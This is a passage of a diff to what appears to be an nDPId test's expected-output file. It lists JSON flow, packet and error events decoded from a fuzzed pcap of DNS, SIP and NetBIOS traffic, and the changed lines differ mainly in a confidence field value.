00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":546,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470848525,"flow_last_seen":1120470848525,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470848525,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2803,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1120470848525,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470848525,"pkt":"ADBUADRWAODtAW5iCABFAABEa7kAAIARS5zAqAECwKgBAQrzADUAMMmyWxkAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470848525,"flow_last_seen":1120470848525,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470848525,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2803,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470848525,"flow_last_seen":1120470848525,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470848525,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2803,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":2,"flow_last_seen":1120470848527,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470848527,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CvMAR6wuWxmAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAMMAAcAMAAyeAQAAJxAACwlsb2NhbGhvc3QA"} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":547,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470848525,"flow_last_seen":1120470848527,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470848527,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2803,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 
+00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":547,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470848525,"flow_last_seen":1120470848527,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470848527,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2803,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":549,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470848643,"flow_last_seen":1120470848643,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470848643,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1120470848643,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470848643,"pkt":"ADBUADRWAODtAW69CABFAABIW7sAAIARS5bAqAECwKgBAQr0ADUANOq3PxkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
-00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470848643,"flow_last_seen":1120470848643,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470848643,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470848643,"flow_last_seen":1120470848643,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470848643,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":551,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120470848686} 
00798{"packet_event_id":1,"packet_event_name":"packet","packet_id":551,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":382,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":382,"pkt_l4_len":0,"thread_ts_msec":1120470848682,"pkt":"ADBUADRWAODtAW69CAA\/AAFwa7wAAIARFgHAeQEC1PIhIxPEE8QBXMMEQUNLIHNpcDowMDk3MjM5Mjg3MDQ0QHNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KRnJvbTogImFyaWsiIDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTE3NWExZGQNbENhbGwtSUQ6IDI0NDg3MzkxLTQ0OWJmMmEwQDE5Mi4xNjguMS4yDQpWaWE6IFNJUC8yLjAvVURQIDE5Mi4xNjguMS4yOjUwNjA7YnJhbmNoPXo5aEc0YktucDI0NDY2NDAyLTQ1ZGM2MWQ1MTkyLjE2OC4xLjI7cnBvcnQNClRvOiA8c2lwOjAwOTcyMzkyODcwNDRAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTBMLTA0JXMALTE3MDFiOWEwLTEzYzkyYTY3Mg0KQ1NlcTogMSBBQ0sNCkNvbnRlbnQtTGVuZ3RoOiAwDQoNCg=="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":2,"flow_last_seen":1120470849636,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470849636,"pkt":"ADBUADRWAODtAW69CABFAABIa70AAIARS5TAqAECwKgBAQr0ADUANOq3JXMAAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJj6XR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":552,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470848643,"flow_last_seen":1120470849636,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cyberc?ty.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470659308,"flow_last_seen":1120470659308,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"107.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470662062,"flow_last_seen":1120470662062,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"115.0.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.184.189.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00821{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470657808,"flow_last_seen":1120470666317,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
-00696{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1120470658556,"flow_last_seen":1120470672075,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":552,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470848643,"flow_last_seen":1120470849636,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberc?ty.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470659308,"flow_last_seen":1120470659308,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"107.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470662062,"flow_last_seen":1120470662062,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"115.0.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.184.189.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00821{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470657808,"flow_last_seen":1120470666317,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
+00696{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1120470658556,"flow_last_seen":1120470672075,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00571{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469635127,"flow_last_seen":1120470796804,"flow_idle_time":620000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","l4_proto":170,"flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":3,"flow_last_seen":1120470851639,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470851639,"pkt":"ADBUADRWAODtAW69CABFAABIa74AAIARS5PAqAECwKgBAQr0ADUANOq3PxkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
-00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470848643,"flow_last_seen":1120470851639,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470851639,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470848643,"flow_last_seen":1120470851639,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470851639,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":554,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2136,"global_ts_msec":1120470853642} 
00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":554,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2136,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470851639,"pkt":"ADBUADRWAODtAW69CFhFAABIa78AAIARS5LAqAECwKgBAQr0ADUANOq3PxkBAAABAAAAAAAABF9zaXAET3VkcANzaXAJY3liZXJjaXR5AuRrAFchAAE="} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":555,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470857648} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":555,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470851639,"pkt":"ADBUADRWAODtAW69CABFAABJa8QAAIARS43AqAECwKgBAQr0ADUANOq3PxkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470670573,"flow_last_seen":1120470670573,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470851639,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.37.115","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470670573,"flow_last_seen":1120470670573,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470851639,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.37.115","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865650,"flow_last_seen":1120470865650,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470865650,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2805,"dst_port":51,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1120470865650,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470865650,"pkt":"ADBUADRWAODtAW69CABFAABEa8UAAIARS5DAqAECwKgBAQr1ADMAMFWvzyVzAAABAAAAAAAAATEBMAEwAzEyNwdpbj1hZGRyBGFmcGEAAAwAAQ=="} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":557,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865651,"flow_last_seen":1120470865651,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470865651,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2805,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1120470865651,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470865651,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CvUARzgrzxqAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsbmNhbGhvc3QA"} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":557,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865651,"flow_last_seen":1120470865651,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470865651,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2805,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 
